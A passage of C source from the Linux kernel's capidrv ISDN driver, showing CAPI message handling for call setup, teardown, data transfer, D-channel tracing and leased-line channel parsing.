* the HL-driver may send ALERTING on the D-channel in
* this case.
* Return code 1 really means: RING on ttyI, or a net
* interface has already accepted this call.
*
* If the call was accepted, the state has already changed
* and a CONNECT_RESP has already been sent.
*/
if (plcip->state == ST_PLCI_INCOMING) {
printk(KERN_INFO "capidrv-%d: incoming call %s,%d,%d,%s tty alerting\n",
card->contrnr,
cmd.parm.setup.phone,
cmd.parm.setup.si1,
cmd.parm.setup.si2,
cmd.parm.setup.eazmsn);
capi_fill_ALERT_REQ(cmsg,
global.ap.applid,
card->msgid++,
plcip->plci, /* adr */
NULL,/* BChannelinformation */
NULL,/* Keypadfacility */
NULL,/* Useruserdata */
NULL /* Facilitydataarray */
);
plcip->msgid = cmsg->Messagenumber;
send_message(card, cmsg);
} else {
printk(KERN_INFO "capidrv-%d: incoming call %s,%d,%d,%s on netdev\n",
card->contrnr,
cmd.parm.setup.phone,
cmd.parm.setup.si1,
cmd.parm.setup.si2,
cmd.parm.setup.eazmsn);
}
break;
case 2: /* Call will be rejected. */
capi_cmsg_answer(cmsg);
cmsg->Reject = 2; /* reject call, normal call clearing */
plci_change_state(card, plcip, EV_PLCI_CONNECT_REJECT);
send_message(card, cmsg);
break;
default:
/* An error happened. (Invalid parameters for example.) */
capi_cmsg_answer(cmsg);
cmsg->Reject = 8; /* reject call,
destination out of order */
plci_change_state(card, plcip, EV_PLCI_CONNECT_REJECT);
send_message(card, cmsg);
break;
}
return;
}
static void handle_plci(_cmsg *cmsg)
{
capidrv_contr *card = findcontrbynumber(cmsg->adr.adrController & 0x7f);
capidrv_plci *plcip;
isdn_ctrl cmd;
_cdebbuf *cdb;
if (!card) {
printk(KERN_ERR "capidrv: %s from unknown controller 0x%x\n",
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrController & 0x7f);
return;
}
switch (CAPICMD(cmsg->Command, cmsg->Subcommand)) {
case CAPI_DISCONNECT_IND: /* plci */
if (cmsg->Reason) {
printk(KERN_INFO "capidrv-%d: %s reason 0x%x (%s) for plci 0x%x\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->Reason, capi_info2str(cmsg->Reason), cmsg->adr.adrPLCI);
}
if (!(plcip = find_plci_by_plci(card, cmsg->adr.adrPLCI))) {
capi_cmsg_answer(cmsg);
send_message(card, cmsg);
goto notfound;
}
card->bchans[plcip->chan].disconnecting = 1;
plci_change_state(card, plcip, EV_PLCI_DISCONNECT_IND);
capi_cmsg_answer(cmsg);
plci_change_state(card, plcip, EV_PLCI_DISCONNECT_RESP);
send_message(card, cmsg);
break;
case CAPI_DISCONNECT_CONF: /* plci */
if (cmsg->Info) {
printk(KERN_INFO "capidrv-%d: %s info 0x%x (%s) for plci 0x%x\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->Info, capi_info2str(cmsg->Info),
cmsg->adr.adrPLCI);
}
if (!(plcip = find_plci_by_plci(card, cmsg->adr.adrPLCI)))
goto notfound;
card->bchans[plcip->chan].disconnecting = 1;
break;
case CAPI_ALERT_CONF: /* plci */
if (cmsg->Info) {
printk(KERN_INFO "capidrv-%d: %s info 0x%x (%s) for plci 0x%x\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->Info, capi_info2str(cmsg->Info),
cmsg->adr.adrPLCI);
}
break;
case CAPI_CONNECT_IND: /* plci */
handle_incoming_call(card, cmsg);
break;
case CAPI_CONNECT_CONF: /* plci */
if (cmsg->Info) {
printk(KERN_INFO "capidrv-%d: %s info 0x%x (%s) for plci 0x%x\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->Info, capi_info2str(cmsg->Info),
cmsg->adr.adrPLCI);
}
if (!(plcip = find_plci_by_msgid(card, cmsg->Messagenumber)))
goto notfound;
plcip->plci = cmsg->adr.adrPLCI;
if (cmsg->Info) {
plci_change_state(card, plcip, EV_PLCI_CONNECT_CONF_ERROR);
} else {
plci_change_state(card, plcip, EV_PLCI_CONNECT_CONF_OK);
}
break;
case CAPI_CONNECT_ACTIVE_IND: /* plci */
if (!(plcip = find_plci_by_plci(card, cmsg->adr.adrPLCI)))
goto notfound;
if (card->bchans[plcip->chan].incoming) {
capi_cmsg_answer(cmsg);
plci_change_state(card, plcip, EV_PLCI_CONNECT_ACTIVE_IND);
send_message(card, cmsg);
} else {
capidrv_ncci *nccip;
capi_cmsg_answer(cmsg);
send_message(card, cmsg);
nccip = new_ncci(card, plcip, cmsg->adr.adrPLCI);
if (!nccip) {
printk(KERN_ERR "capidrv-%d: no mem for ncci, sorry\n", card->contrnr);
break; /* $$$$ */
}
capi_fill_CONNECT_B3_REQ(cmsg,
global.ap.applid,
card->msgid++,
plcip->plci, /* adr */
NULL /* NCPI */
);
nccip->msgid = cmsg->Messagenumber;
plci_change_state(card, plcip,
EV_PLCI_CONNECT_ACTIVE_IND);
ncci_change_state(card, nccip, EV_NCCI_CONNECT_B3_REQ);
send_message(card, cmsg);
cmd.command = ISDN_STAT_DCONN;
cmd.driver = card->myid;
cmd.arg = plcip->chan;
card->interface.statcallb(&cmd);
}
break;
case CAPI_INFO_IND: /* Controller/plci */
if (!(plcip = find_plci_by_plci(card, cmsg->adr.adrPLCI)))
goto notfound;
if (cmsg->InfoNumber == 0x4000) {
if (cmsg->InfoElement[0] == 4) {
cmd.command = ISDN_STAT_CINF;
cmd.driver = card->myid;
cmd.arg = plcip->chan;
sprintf(cmd.parm.num, "%lu",
(unsigned long)
((u32) cmsg->InfoElement[1]
| ((u32) (cmsg->InfoElement[2]) << 8)
| ((u32) (cmsg->InfoElement[3]) << 16)
| ((u32) (cmsg->InfoElement[4]) << 24)));
card->interface.statcallb(&cmd);
break;
}
}
cdb = capi_cmsg2str(cmsg);
if (cdb) {
printk(KERN_WARNING "capidrv-%d: %s\n",
card->contrnr, cdb->buf);
cdebbuf_free(cdb);
} else
printk(KERN_WARNING "capidrv-%d: CAPI_INFO_IND InfoNumber %x not handled\n",
card->contrnr, cmsg->InfoNumber);
break;
case CAPI_CONNECT_ACTIVE_CONF: /* plci */
goto ignored;
case CAPI_SELECT_B_PROTOCOL_CONF: /* plci */
goto ignored;
case CAPI_FACILITY_IND: /* Controller/plci/ncci */
goto ignored;
case CAPI_FACILITY_CONF: /* Controller/plci/ncci */
goto ignored;
case CAPI_INFO_CONF: /* Controller/plci */
goto ignored;
default:
printk(KERN_ERR "capidrv-%d: got %s for plci 0x%x ???",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrPLCI);
}
return;
ignored:
printk(KERN_INFO "capidrv-%d: %s for plci 0x%x ignored\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrPLCI);
return;
notfound:
printk(KERN_ERR "capidrv-%d: %s: plci 0x%x not found\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrPLCI);
return;
}
static void handle_ncci(_cmsg *cmsg)
{
capidrv_contr *card = findcontrbynumber(cmsg->adr.adrController & 0x7f);
capidrv_plci *plcip;
capidrv_ncci *nccip;
isdn_ctrl cmd;
int len;
if (!card) {
printk(KERN_ERR "capidrv: %s from unknown controller 0x%x\n",
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrController & 0x7f);
return;
}
switch (CAPICMD(cmsg->Command, cmsg->Subcommand)) {
case CAPI_CONNECT_B3_ACTIVE_IND: /* ncci */
if (!(nccip = find_ncci(card, cmsg->adr.adrNCCI)))
goto notfound;
capi_cmsg_answer(cmsg);
ncci_change_state(card, nccip, EV_NCCI_CONNECT_B3_ACTIVE_IND);
send_message(card, cmsg);
cmd.command = ISDN_STAT_BCONN;
cmd.driver = card->myid;
cmd.arg = nccip->chan;
card->interface.statcallb(&cmd);
printk(KERN_INFO "capidrv-%d: chan %d up with ncci 0x%x\n",
card->contrnr, nccip->chan, nccip->ncci);
break;
case CAPI_CONNECT_B3_ACTIVE_CONF: /* ncci */
goto ignored;
case CAPI_CONNECT_B3_IND: /* ncci */
plcip = find_plci_by_ncci(card, cmsg->adr.adrNCCI);
if (plcip) {
nccip = new_ncci(card, plcip, cmsg->adr.adrNCCI);
if (nccip) {
ncci_change_state(card, nccip, EV_NCCI_CONNECT_B3_IND);
capi_fill_CONNECT_B3_RESP(cmsg,
global.ap.applid,
card->msgid++,
nccip->ncci, /* adr */
0, /* Reject */
NULL /* NCPI */
);
ncci_change_state(card, nccip, EV_NCCI_CONNECT_B3_RESP);
send_message(card, cmsg);
break;
}
printk(KERN_ERR "capidrv-%d: no mem for ncci, sorry\n", card->contrnr);
} else {
printk(KERN_ERR "capidrv-%d: %s: plci for ncci 0x%x not found\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrNCCI);
}
capi_fill_CONNECT_B3_RESP(cmsg,
global.ap.applid,
card->msgid++,
cmsg->adr.adrNCCI,
2, /* Reject */
NULL /* NCPI */
);
send_message(card, cmsg);
break;
case CAPI_CONNECT_B3_CONF: /* ncci */
if (!(nccip = find_ncci_by_msgid(card,
cmsg->adr.adrNCCI,
cmsg->Messagenumber)))
goto notfound;
nccip->ncci = cmsg->adr.adrNCCI;
if (cmsg->Info) {
printk(KERN_INFO "capidrv-%d: %s info 0x%x (%s) for ncci 0x%x\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->Info, capi_info2str(cmsg->Info),
cmsg->adr.adrNCCI);
}
if (cmsg->Info)
ncci_change_state(card, nccip, EV_NCCI_CONNECT_B3_CONF_ERROR);
else
ncci_change_state(card, nccip, EV_NCCI_CONNECT_B3_CONF_OK);
break;
case CAPI_CONNECT_B3_T90_ACTIVE_IND: /* ncci */
capi_cmsg_answer(cmsg);
send_message(card, cmsg);
break;
case CAPI_DATA_B3_IND: /* ncci */
/* handled in handle_data() */
goto ignored;
case CAPI_DATA_B3_CONF: /* ncci */
if (cmsg->Info) {
printk(KERN_WARNING "CAPI_DATA_B3_CONF: Info %x - %s\n",
cmsg->Info, capi_info2str(cmsg->Info));
}
if (!(nccip = find_ncci(card, cmsg->adr.adrNCCI)))
goto notfound;
len = capidrv_del_ack(nccip, cmsg->DataHandle);
if (len < 0)
break;
cmd.command = ISDN_STAT_BSENT;
cmd.driver = card->myid;
cmd.arg = nccip->chan;
cmd.parm.length = len;
card->interface.statcallb(&cmd);
break;
case CAPI_DISCONNECT_B3_IND: /* ncci */
if (!(nccip = find_ncci(card, cmsg->adr.adrNCCI)))
goto notfound;
card->bchans[nccip->chan].disconnecting = 1;
ncci_change_state(card, nccip, EV_NCCI_DISCONNECT_B3_IND);
capi_cmsg_answer(cmsg);
ncci_change_state(card, nccip, EV_NCCI_DISCONNECT_B3_RESP);
send_message(card, cmsg);
break;
case CAPI_DISCONNECT_B3_CONF: /* ncci */
if (!(nccip = find_ncci(card, cmsg->adr.adrNCCI)))
goto notfound;
if (cmsg->Info) {
printk(KERN_INFO "capidrv-%d: %s info 0x%x (%s) for ncci 0x%x\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->Info, capi_info2str(cmsg->Info),
cmsg->adr.adrNCCI);
ncci_change_state(card, nccip, EV_NCCI_DISCONNECT_B3_CONF_ERROR);
}
break;
case CAPI_RESET_B3_IND: /* ncci */
if (!(nccip = find_ncci(card, cmsg->adr.adrNCCI)))
goto notfound;
ncci_change_state(card, nccip, EV_NCCI_RESET_B3_IND);
capi_cmsg_answer(cmsg);
send_message(card, cmsg);
break;
case CAPI_RESET_B3_CONF: /* ncci */
goto ignored; /* $$$$ */
case CAPI_FACILITY_IND: /* Controller/plci/ncci */
goto ignored;
case CAPI_FACILITY_CONF: /* Controller/plci/ncci */
goto ignored;
default:
printk(KERN_ERR "capidrv-%d: got %s for ncci 0x%x ???",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrNCCI);
}
return;
ignored:
printk(KERN_INFO "capidrv-%d: %s for ncci 0x%x ignored\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrNCCI);
return;
notfound:
printk(KERN_ERR "capidrv-%d: %s: ncci 0x%x not found\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrNCCI);
}
static void handle_data(_cmsg *cmsg, struct sk_buff *skb)
{
capidrv_contr *card = findcontrbynumber(cmsg->adr.adrController & 0x7f);
capidrv_ncci *nccip;
if (!card) {
printk(KERN_ERR "capidrv: %s from unknown controller 0x%x\n",
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrController & 0x7f);
kfree_skb(skb);
return;
}
if (!(nccip = find_ncci(card, cmsg->adr.adrNCCI))) {
printk(KERN_ERR "capidrv-%d: %s: ncci 0x%x not found\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrNCCI);
kfree_skb(skb);
return;
}
(void) skb_pull(skb, CAPIMSG_LEN(skb->data));
card->interface.rcvcallb_skb(card->myid, nccip->chan, skb);
capi_cmsg_answer(cmsg);
send_message(card, cmsg);
}
static _cmsg s_cmsg;
static void capidrv_recv_message(struct capi20_appl *ap, struct sk_buff *skb)
{
capi_message2cmsg(&s_cmsg, skb->data);
if (debugmode > 3) {
_cdebbuf *cdb = capi_cmsg2str(&s_cmsg);
if (cdb) {
printk(KERN_DEBUG "%s: applid=%d %s\n", __func__,
ap->applid, cdb->buf);
cdebbuf_free(cdb);
} else
printk(KERN_DEBUG "%s: applid=%d %s not traced\n",
__func__, ap->applid,
capi_cmd2str(s_cmsg.Command, s_cmsg.Subcommand));
}
if (s_cmsg.Command == CAPI_DATA_B3
&& s_cmsg.Subcommand == CAPI_IND) {
handle_data(&s_cmsg, skb);
return;
}
if ((s_cmsg.adr.adrController & 0xffffff00) == 0)
handle_controller(&s_cmsg);
else if ((s_cmsg.adr.adrPLCI & 0xffff0000) == 0)
handle_plci(&s_cmsg);
else
handle_ncci(&s_cmsg);
/*
* data of skb used in s_cmsg,
* free data when s_cmsg is not used again
* thanks to Lars Heete <[email protected]>
*/
kfree_skb(skb);
}
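/*
 * CAPI address decoding used above: bits 0..6 select the controller; if
 * byte 1 (the PLCI part) is zero the message is controller-level, if bits
 * 16..31 (the NCCI part) are zero it is PLCI-level, otherwise NCCI-level.
 * DATA_B3_IND is special-cased first so payload skbs reach isdn4linux
 * without an extra copy.
 */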
/* ------------------------------------------------------------------- */
#define PUTBYTE_TO_STATUS(card, byte) \
do { \
*(card)->q931_write++ = (byte); \
if ((card)->q931_write > (card)->q931_end) \
(card)->q931_write = (card)->q931_buf; \
} while (0)
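/*
 * q931_buf is used as a ring buffer: the macro above advances the write
 * pointer, wrapping at q931_end, and if_readstat() drains it with the
 * matching read pointer. There is no overflow check, so a slow reader can
 * be lapped; the D-channel trace is best-effort only.
 */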
static void handle_dtrace_data(capidrv_contr *card,
int send, int level2, u8 *data, u16 len)
{
u8 *p, *end;
isdn_ctrl cmd;
if (!len) {
printk(KERN_DEBUG "capidrv-%d: avmb1_q931_data: len == %d\n",
card->contrnr, len);
return;
}
if (level2) {
PUTBYTE_TO_STATUS(card, 'D');
PUTBYTE_TO_STATUS(card, '2');
PUTBYTE_TO_STATUS(card, send ? '>' : '<');
PUTBYTE_TO_STATUS(card, ':');
} else {
PUTBYTE_TO_STATUS(card, 'D');
PUTBYTE_TO_STATUS(card, '3');
PUTBYTE_TO_STATUS(card, send ? '>' : '<');
PUTBYTE_TO_STATUS(card, ':');
}
for (p = data, end = data + len; p < end; p++) {
PUTBYTE_TO_STATUS(card, ' ');
PUTBYTE_TO_STATUS(card, hex_asc_hi(*p));
PUTBYTE_TO_STATUS(card, hex_asc_lo(*p));
}
PUTBYTE_TO_STATUS(card, '\n');
cmd.command = ISDN_STAT_STAVAIL;
cmd.driver = card->myid;
cmd.arg = len * 3 + 5;
card->interface.statcallb(&cmd);
}
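/* The announced length is exact: 4 header bytes ("D2>:" or similar), plus
 * 3 bytes (" xx") per data byte, plus the trailing newline = len * 3 + 5.
 */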
/* ------------------------------------------------------------------- */
static _cmsg cmdcmsg;
static int capidrv_ioctl(isdn_ctrl *c, capidrv_contr *card)
{
switch (c->arg) {
case 1:
debugmode = (int)(*((unsigned int *)c->parm.num));
printk(KERN_DEBUG "capidrv-%d: debugmode=%d\n",
card->contrnr, debugmode);
return 0;
default:
printk(KERN_DEBUG "capidrv-%d: capidrv_ioctl(%ld) called ??\n",
card->contrnr, c->arg);
return -EINVAL;
}
return -EINVAL;
}
/*
* Handle leased lines (CAPI-Bundling)
*/
struct internal_bchannelinfo {
unsigned short channelalloc;
unsigned short operation;
unsigned char cmask[31];
};
static int decodeFVteln(char *teln, unsigned long *bmaskp, int *activep)
{
unsigned long bmask = 0;
int active = !0;
char *s;
int i;
if (strncmp(teln, "FV:", 3) != 0)
return 1;
s = teln + 3;
while (*s && *s == ' ') s++;
if (!*s) return -2;
if (*s == 'p' || *s == 'P') {
active = 0;
s++;
}
if (*s == 'a' || *s == 'A') {
active = !0;
s++;
}
while (*s) {
int digit1 = 0;
int digit2 = 0;
char *endp;
digit1 = simple_strtoul(s, &endp, 10);
if (s == endp)
return -3;
s = endp;
if (digit1 <= 0 || digit1 > 30) return -4;
if (*s == 0 || *s == ',' || *s == ' ') {
bmask |= (1 << digit1);
digit1 = 0;
if (*s) s++;
continue;
}
if (*s != '-') return -5;
s++;
digit2 = simple_strtoul(s, &endp, 10);
if (s == endp)
return -3;
s = endp;
if (digit2 <= 0 || digit2 > 30) return -4;
if (*s == 0 || *s == ',' || *s == ' ') {
if (digit1 > digit2)
for (i = digit2; i <= digit1; i++)
bmask |= (1 << i);
else
for (i = digit1; i <= digit2; i++)
bmask |= (1 << i);
digit1 = digit2 = 0;
if (*s) s++;
continue;
}
return -6;
}
if (activep) *activep = active;
if (bmaskp) *bmaskp = bmask;
return 0;
}
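/*
 * Illustrative inputs accepted above: "FV:1" selects B-channel 1 in
 * active mode, "FV:p1-5,7" selects channels 1..5 and 7 in passive mode.
 * Channels must lie in 1..30; 0 (the D-channel) is rejected.
 */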
static int FVteln2capi20(char *teln, u8 AdditionalInfo[1 + 2 + 2 + 31])
{
unsigned long bmask;
int active;
int rc, i;
rc = decodeFVteln(teln, &bmask, &active);
if (rc) return rc;
/* Length */
AdditionalInfo[0] = 2 + 2 + 31;
/* Channel: 3 => use channel allocation */
AdditionalInfo[1] = 3; AdditionalInfo[2] = 0;
/* Operation: 0 => DTE mode, 1 => DCE mode */
if (active) {
AdditionalInfo[3] = 0; AdditionalInfo[4] = 0;
} else {
AdditionalInfo[3] = 1; AdditionalInfo[4] = 0;
}
/* Channel mask array */
AdditionalInfo[5] = 0; /* no D-Channel */
for (i = 1; i <= 30; i++)
AdditionalInfo[5 + i] = (bmask & (1 << i)) ? 0xff : 0;
return 0;
}
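/*
 * Resulting AdditionalInfo layout (a 35-byte CAPI _cstruct):
 * [0] length = 35
 * [1..2] Channel = 3 (use channel allocation), little endian
 * [3..4] Operation: 0 = DTE mode (active), 1 = DCE mode (passive)
 * [5..35] channel mask, one byte per channel (0xff = allocate);
 * the first mask byte is the D-channel and stays 0
 */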
static int capidrv_command(isdn_ctrl *c, capidrv_contr *card)
{
isdn_ctrl cmd;
struct capidrv_bchan *bchan;
struct capidrv_plci *plcip;
u8 AdditionalInfo[1 + 2 + 2 + 31];
int rc, isleasedline = 0;
if (c->command == ISDN_CMD_IOCTL)
return capidrv_ioctl(c, card);
switch (c->command) {
case ISDN_CMD_DIAL:{
u8 calling[ISDN_MSNLEN + 3];
u8 called[ISDN_MSNLEN + 2];
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: ISDN_CMD_DIAL(ch=%ld,\"%s,%d,%d,%s\")\n",
card->contrnr,
c->arg,
c->parm.setup.phone,
c->parm.setup.si1,
c->parm.setup.si2,
c->parm.setup.eazmsn);
bchan = &card->bchans[c->arg % card->nbchan];
if (bchan->plcip) {
printk(KERN_ERR "capidrv-%d: dail ch=%ld,\"%s,%d,%d,%s\" in use (plci=0x%x)\n",
card->contrnr,
c->arg,
c->parm.setup.phone,
c->parm.setup.si1,
c->parm.setup.si2,
c->parm.setup.eazmsn,
bchan->plcip->plci);
return 0;
}
bchan->si1 = c->parm.setup.si1;
bchan->si2 = c->parm.setup.si2;
strncpy(bchan->num, c->parm.setup.phone, sizeof(bchan->num));
strncpy(bchan->mynum, c->parm.setup.eazmsn, sizeof(bchan->mynum));
rc = FVteln2capi20(bchan->num, AdditionalInfo);
isleasedline = (rc == 0);
if (rc < 0)
printk(KERN_ERR "capidrv-%d: WARNING: invalid leased linedefinition \"%s\"\n", card->contrnr, bchan->num);
if (isleasedline) {
calling[0] = 0;
called[0] = 0;
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: connecting leased line\n", card->contrnr);
} else {
calling[0] = strlen(bchan->mynum) + 2;
calling[1] = 0;
calling[2] = 0x80;
strncpy(calling + 3, bchan->mynum, ISDN_MSNLEN);
called[0] = strlen(bchan->num) + 1;
called[1] = 0x80;
strncpy(called + 2, bchan->num, ISDN_MSNLEN);
}
capi_fill_CONNECT_REQ(&cmdcmsg,
global.ap.applid,
card->msgid++,
card->contrnr, /* adr */
si2cip(bchan->si1, bchan->si2), /* cipvalue */
called, /* CalledPartyNumber */
calling, /* CallingPartyNumber */
NULL, /* CalledPartySubaddress */
NULL, /* CallingPartySubaddress */
b1prot(bchan->l2, bchan->l3), /* B1protocol */
b2prot(bchan->l2, bchan->l3), /* B2protocol */
b3prot(bchan->l2, bchan->l3), /* B3protocol */
b1config(bchan->l2, bchan->l3), /* B1configuration */
NULL, /* B2configuration */
NULL, /* B3configuration */
NULL, /* BC */
NULL, /* LLC */
NULL, /* HLC */
/* BChannelinformation */
isleasedline ? AdditionalInfo : NULL,
NULL, /* Keypadfacility */
NULL, /* Useruserdata */
NULL /* Facilitydataarray */
);
if ((plcip = new_plci(card, (c->arg % card->nbchan))) == NULL) {
cmd.command = ISDN_STAT_DHUP;
cmd.driver = card->myid;
cmd.arg = (c->arg % card->nbchan);
card->interface.statcallb(&cmd);
return -1;
}
plcip->msgid = cmdcmsg.Messagenumber;
plcip->leasedline = isleasedline;
plci_change_state(card, plcip, EV_PLCI_CONNECT_REQ);
send_message(card, &cmdcmsg);
return 0;
}
case ISDN_CMD_ACCEPTD:
bchan = &card->bchans[c->arg % card->nbchan];
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: ISDN_CMD_ACCEPTD(ch=%ld) l2=%d l3=%d\n",
card->contrnr,
c->arg, bchan->l2, bchan->l3);
capi_fill_CONNECT_RESP(&cmdcmsg,
global.ap.applid,
card->msgid++,
bchan->plcip->plci, /* adr */
0, /* Reject */
b1prot(bchan->l2, bchan->l3), /* B1protocol */
b2prot(bchan->l2, bchan->l3), /* B2protocol */
b3prot(bchan->l2, bchan->l3), /* B3protocol */
b1config(bchan->l2, bchan->l3), /* B1configuration */
NULL, /* B2configuration */
NULL, /* B3configuration */
NULL, /* ConnectedNumber */
NULL, /* ConnectedSubaddress */
NULL, /* LLC */
NULL, /* BChannelinformation */
NULL, /* Keypadfacility */
NULL, /* Useruserdata */
NULL /* Facilitydataarray */
);
capi_cmsg2message(&cmdcmsg, cmdcmsg.buf);
plci_change_state(card, bchan->plcip, EV_PLCI_CONNECT_RESP);
send_message(card, &cmdcmsg);
return 0;
case ISDN_CMD_ACCEPTB:
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: ISDN_CMD_ACCEPTB(ch=%ld)\n",
card->contrnr,
c->arg);
return -ENOSYS;
case ISDN_CMD_HANGUP:
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: ISDN_CMD_HANGUP(ch=%ld)\n",
card->contrnr,
c->arg);
bchan = &card->bchans[c->arg % card->nbchan];
if (bchan->disconnecting) {
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: chan %ld already disconnecting ...\n",
card->contrnr,
c->arg);
return 0;
}
if (bchan->nccip) {
bchan->disconnecting = 1;
capi_fill_DISCONNECT_B3_REQ(&cmdcmsg,
global.ap.applid,
card->msgid++,
bchan->nccip->ncci,
NULL /* NCPI */
);
ncci_change_state(card, bchan->nccip, EV_NCCI_DISCONNECT_B3_REQ);
send_message(card, &cmdcmsg);
return 0;
} else if (bchan->plcip) {
if (bchan->plcip->state == ST_PLCI_INCOMING) {
/*
* just ignore; we are called from
* isdn_status_callback(),
* which will return 0 or 2; this is handled
* by the CONNECT_IND handler
*/
bchan->disconnecting = 1;
return 0;
} else if (bchan->plcip->plci) {
bchan->disconnecting = 1;
capi_fill_DISCONNECT_REQ(&cmdcmsg,
global.ap.applid,
card->msgid++,
bchan->plcip->plci,
NULL, /* BChannelinformation */
NULL, /* Keypadfacility */
NULL, /* Useruserdata */
NULL /* Facilitydataarray */
);
plci_change_state(card, bchan->plcip, EV_PLCI_DISCONNECT_REQ);
send_message(card, &cmdcmsg);
return 0;
} else {
printk(KERN_ERR "capidrv-%d: chan %ld disconnect request while waiting for CONNECT_CONF\n",
card->contrnr,
c->arg);
return -EINVAL;
}
}
printk(KERN_ERR "capidrv-%d: chan %ld disconnect request on free channel\n",
card->contrnr,
c->arg);
return -EINVAL;
/* ready */
case ISDN_CMD_SETL2:
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: set L2 on chan %ld to %ld\n",
card->contrnr,
(c->arg & 0xff), (c->arg >> 8));
bchan = &card->bchans[(c->arg & 0xff) % card->nbchan];
bchan->l2 = (c->arg >> 8);
return 0;
case ISDN_CMD_SETL3:
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: set L3 on chan %ld to %ld\n",
card->contrnr,
(c->arg & 0xff), (c->arg >> 8));
bchan = &card->bchans[(c->arg & 0xff) % card->nbchan];
bchan->l3 = (c->arg >> 8);
return 0;
case ISDN_CMD_SETEAZ:
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: set EAZ \"%s\" on chan %ld\n",
card->contrnr,
c->parm.num, c->arg);
bchan = &card->bchans[c->arg % card->nbchan];
strncpy(bchan->msn, c->parm.num, ISDN_MSNLEN);
return 0;
case ISDN_CMD_CLREAZ:
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: clearing EAZ on chan %ld\n",
card->contrnr, c->arg);
bchan = &card->bchans[c->arg % card->nbchan];
bchan->msn[0] = 0;
return 0;
default:
printk(KERN_ERR "capidrv-%d: ISDN_CMD_%d, Huh?\n",
card->contrnr, c->command);
return -EINVAL;
}
return 0;
}
static int if_command(isdn_ctrl *c)
{
capidrv_contr *card = findcontrbydriverid(c->driver);
if (card)
return capidrv_command(c, card);
printk(KERN_ERR
"capidrv: if_command %d called with invalid driverId %d!\n",
c->command, c->driver);
return -ENODEV;
}
static _cmsg sendcmsg;
static int if_sendbuf(int id, int channel, int doack, struct sk_buff *skb)
{
capidrv_contr *card = findcontrbydriverid(id);
capidrv_bchan *bchan;
capidrv_ncci *nccip;
int len = skb->len;
int msglen;
u16 errcode;
u16 datahandle;
u32 data;
if (!card) {
printk(KERN_ERR "capidrv: if_sendbuf called with invalid driverId %d!\n",
id);
return 0;
}
if (debugmode > 4)
printk(KERN_DEBUG "capidrv-%d: sendbuf len=%d skb=%p doack=%d\n",
card->contrnr, len, skb, doack);
bchan = &card->bchans[channel % card->nbchan];
nccip = bchan->nccip;
if (!nccip || nccip->state != ST_NCCI_ACTIVE) {
printk(KERN_ERR "capidrv-%d: if_sendbuf: %s:%d: chan not up!\n",
card->contrnr, card->name, channel);
return 0;
}
datahandle = nccip->datahandle;
/*
* Here we copy the pointer skb->data into the 32-bit 'Data' field.
* The 'Data' field is not used in practice in the Linux kernel
* (neither in 32 nor in 64 bit), but should have some value,
* since a CAPI message trace will display it.
*
* The correct value in the 32-bit case is the address of the
* data; in 64 bit it makes no sense, so we use 0 there.
*/
#ifdef CONFIG_64BIT
data = 0;
#else
data = (unsigned long) skb->data;
#endif
capi_fill_DATA_B3_REQ(&sendcmsg, global.ap.applid, card->msgid++,
nccip->ncci, /* adr */
data, /* Data */
skb->len, /* DataLength */
datahandle, /* DataHandle */
0 /* Flags */
);
if (capidrv_add_ack(nccip, datahandle, doack ? (int)skb->len : -1) < 0)
return 0;
capi_cmsg2message(&sendcmsg, sendcmsg.buf);
msglen = CAPIMSG_LEN(sendcmsg.buf);
if (skb_headroom(skb) < msglen) {
struct sk_buff *nskb = skb_realloc_headroom(skb, msglen);
if (!nskb) {
printk(KERN_ERR "capidrv-%d: if_sendbuf: no memory\n",
card->contrnr);
(void)capidrv_del_ack(nccip, datahandle);
return 0;
}
printk(KERN_DEBUG "capidrv-%d: only %d bytes headroom, need %d\n",
card->contrnr, skb_headroom(skb), msglen);
memcpy(skb_push(nskb, msglen), sendcmsg.buf, msglen);
errcode = capi20_put_message(&global.ap, nskb);
if (errcode == CAPI_NOERROR) {
dev_kfree_skb(skb);
nccip->datahandle++;
return len;
}
if (debugmode > 3)
printk(KERN_DEBUG "capidrv-%d: sendbuf putmsg ret(%x) - %s\n",
card->contrnr, errcode, capi_info2str(errcode));
(void)capidrv_del_ack(nccip, datahandle);
dev_kfree_skb(nskb);
return errcode == CAPI_SENDQUEUEFULL ? 0 : -1;
} else {
memcpy(skb_push(skb, msglen), sendcmsg.buf, msglen);
errcode = capi20_put_message(&global.ap, skb);
if (errcode == CAPI_NOERROR) {
nccip->datahandle++;
return len;
}
if (debugmode > 3)
printk(KERN_DEBUG "capidrv-%d: sendbuf putmsg ret(%x) - %s\n",
card->contrnr, errcode, capi_info2str(errcode));
skb_pull(skb, msglen);
(void)capidrv_del_ack(nccip, datahandle);
